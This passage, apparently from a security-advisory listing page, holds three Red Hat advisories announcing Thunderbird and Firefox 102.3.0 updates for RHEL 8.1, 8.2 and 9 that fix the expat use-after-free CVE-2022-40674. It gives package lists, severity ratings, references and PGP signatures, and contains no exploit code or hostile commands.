CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.3.0-4.el9_0.src.rpm

aarch64:  
thunderbird-102.3.0-4.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.3.0-4.el9_0.aarch64.rpm  
thunderbird-debugsource-102.3.0-4.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.3.0-4.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-4.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.3.0-4.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.3.0-4.el9_0.s390x.rpm  
thunderbird-debuginfo-102.3.0-4.el9_0.s390x.rpm  
thunderbird-debugsource-102.3.0-4.el9_0.s390x.rpm

x86_64:  
thunderbird-102.3.0-4.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.3.0-4.el9_0.x86_64.rpm  
thunderbird-debugsource-102.3.0-4.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08TEtzjgjWX9erEAQgTaBAAgky7cSvjw8GQDOP123F2vfNSHE+92Oqq  
NsNV9G4UEyclAzsvDCPnH5z3cA+O2mnJux84AVilPOBnGLCgmMRlMc3Am//aYY8Q  
cfPMWtTjrLsSTjDW0GFIgjY1YDMswFaM7dEwCYtWjnCqEU4cYuyKo7Ot+W5S1W51  
NgK8Ox2b0KuyUyGWky/3pFH7dJY/EU3iZ5qyAxOTlrGO/CiMYFFXeSjd5roNRTf5  
Gq5wzM29YsRgV9cWSIL2hwjByd5USAe7YC3CwTFaSyWuOFTo0kmDxg5wtxnri6Su  
0aW7gI8YoJd4ySZiN3JLcpSYufeIvH4qrBVdYjjI5mPKpXYHvO0K8OYG+6GzAPHe  
+OOPUD2newAmq1ABwat5/g3ItXYH6gY71zRzon9Sl9CBwswqo6JoJWnaBYUbhijq  
5R1gjJdrPIz7kQ6wId920mhIT/fJw6HtYFVbUv4IIoOGlN+w6gWFZxT1p6EW3HXX  
e6QnVKevy6fh+Aa290gt8XFiF2UkNmwFogcMmbTtTYZrYR0X8Y18c4cV5meFSKKZ  
8/iM2N9BgHNPsozoKL53SHKiOoaJvz7R4DuXG4RoXORILBQnclpU/XD52WMSqc/i  
35404EKT+KOzsb/1in47rTfkyYyl91ND0pi0hNzqB+IypTc8VloArFg3/8z8wdOZ  
AkfS94BmlO8=ZbcA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7026-01

Red Hat Security Advisory 2022-7022-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:7022-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7022  
Issue date:        2022-10-18  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
firefox-102.3.0-7.el8_2.src.rpm

aarch64:  
firefox-102.3.0-7.el8_2.aarch64.rpm  
firefox-debuginfo-102.3.0-7.el8_2.aarch64.rpm  
firefox-debugsource-102.3.0-7.el8_2.aarch64.rpm

ppc64le:  
firefox-102.3.0-7.el8_2.ppc64le.rpm  
firefox-debuginfo-102.3.0-7.el8_2.ppc64le.rpm  
firefox-debugsource-102.3.0-7.el8_2.ppc64le.rpm

s390x:  
firefox-102.3.0-7.el8_2.s390x.rpm  
firefox-debuginfo-102.3.0-7.el8_2.s390x.rpm  
firefox-debugsource-102.3.0-7.el8_2.s390x.rpm

x86_64:  
firefox-102.3.0-7.el8_2.x86_64.rpm  
firefox-debuginfo-102.3.0-7.el8_2.x86_64.rpm  
firefox-debugsource-102.3.0-7.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08TRNzjgjWX9erEAQj7txAAp3DovL2HGZWf0NbucowSfv4LZLbiU+9N  
zVMZRF5lqGD6y6t1TT2Aq6FpA1FWb9UI1AA4jyoOXNI8frpG79duf2/1S2YPcRQN  
rZP6iwaWnAslnaP3OYXMJrEOQhXrSTsSPmIUqJ4002WpoFVrKEnZga3D6K17olcw  
GfYIXcOWq3ZYFbr2893+dJ/QWej4fVi6MQAtUzKzA2ylTygC0Vo/LyOBjLJovUpm  
DMgDdHwWMNbOcjjAOEh7LkwqVkdcPwB7a0EcHyy8hQJD8uM//bgyQXYUi4r6dGt4  
lDt8DyuMYQ7ShF4aPTXadCgJzqBBYSST5ONUsrIOGVpcFuOem1LTLycC8LVNfWeb  
pyBZbeRj4WtLIYr2UxUYDUU7ZwQlOCX7SxrBtKo0u54dviJv9WrGXGtc13f04iLS  
/NqGaP3+5f0jg6as0LxPEAxyO9/UNXZjKheu+1HXJgpHQwG7anhERk37peeifq6L  
p4zX6nYpW8bEwolv5h2SXcfmZErye4pWq6uOZvrsAWO3iaY2I50F3a/IJA27tCMn  
+JS4++B49/2+TY7evm5ZT4Uj/7dVLxAABL6BpIgy/C+mPPHt/ZN3sLYWDAB76ifH  
0PsnGlxlhy0A4Wd3HBdIuZNyWrgQrRBkkGDx638phXB2luHPGfz4Dm9FRTPlBJhI  
qAbguAJZLvc=HmDu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7022-01

Red Hat Security Advisory 2022-7021-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:7021-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7021  
Issue date:        2022-10-18  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.3.0-4.el8_1.src.rpm

ppc64le:  
thunderbird-102.3.0-4.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-4.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.3.0-4.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.3.0-4.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.3.0-4.el8_1.x86_64.rpm  
thunderbird-debugsource-102.3.0-4.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08TJtzjgjWX9erEAQj7/A/+Lrr+mDxNZa7oeqnJohGiAyksRMnYfIbf  
JfomidQqBiaQXYVv/ciiruKMvc0rbDQ5HS5LkDhPNji+D9xVq/0G/1MNKQtdJY/I  
09lRuk8U+yhTYOpuXR3rCoPDg2h043ghnTto1ScCJx2o/jjleRPCdTUcL+UE5h1L  
wpwdSuVR7O4bAEFsX4f8LRko+xI0V0PzynyIx/09wLdCCNwPkf5eXf5OLNRUZ7UW  
LFQPDOfZ8YJKjA6Ld7skfdcFkhY1c/hNbLY71j2lJhi/8K0ezUL/QNCBymWrOoXl  
g2pV3NEAm2hTyz05A8i814maMTbi6PIA3oIcBRKPMz95CcyBOFjmV5OCr2udyyel  
IR1ct/2dFU4As/AmVcvCOidg3uUHi3xhCiWJbel2r+2ru9Ntxo4Um82rfxjN7EvK  
fSXcYFsnEKHalwouRSV3tM5u4Zl6DISUuV6ACnI+0cnA46za2WqOKbE4bJaTQPWT  
C7nROAnHo6KZFgCS+u1sA0qGSMLks1g84d2M4NNxp5oDJRT767pPXKEm3uWMrYmu  
P9/GGqfSJo36TnNBEtXg32z2sYf9Px1i5gwhv1Bzl0OAz2x6iwGIO8jr4ERWkmkg  
aB/mRUhyRXe+UnxcviTWhDmsRjGeiTaa5eRbStexvvd/9Vc3hk7yigIeE+pyypO+  
xJUBPUdUH/U=I6zr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux